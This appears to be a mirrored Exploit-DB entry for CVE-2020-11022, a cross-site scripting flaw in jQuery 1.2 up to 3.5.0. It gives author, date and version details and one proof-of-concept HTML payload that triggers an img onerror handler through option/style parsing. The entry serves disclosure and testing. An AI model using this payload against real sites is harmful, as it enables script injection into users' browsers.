jQuery 1.2 – Cross-Site Scripting (XSS)

  • 作者: Central InfoSec
    日期: 2021-04-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49766/
  • # Exploit Title: jQuery 1.2 - Cross-Site Scripting (XSS)
    # Date: 04/29/2020
    # Exploit Author: Central InfoSec
    # Version: jQuery versions greater than or equal to 1.2 and before 3.5.0
    # CVE : CVE-2020-11022
    
    # Proof of Concept 1:
    <option><style></option></select><img src=x onerror=alert(1)></style>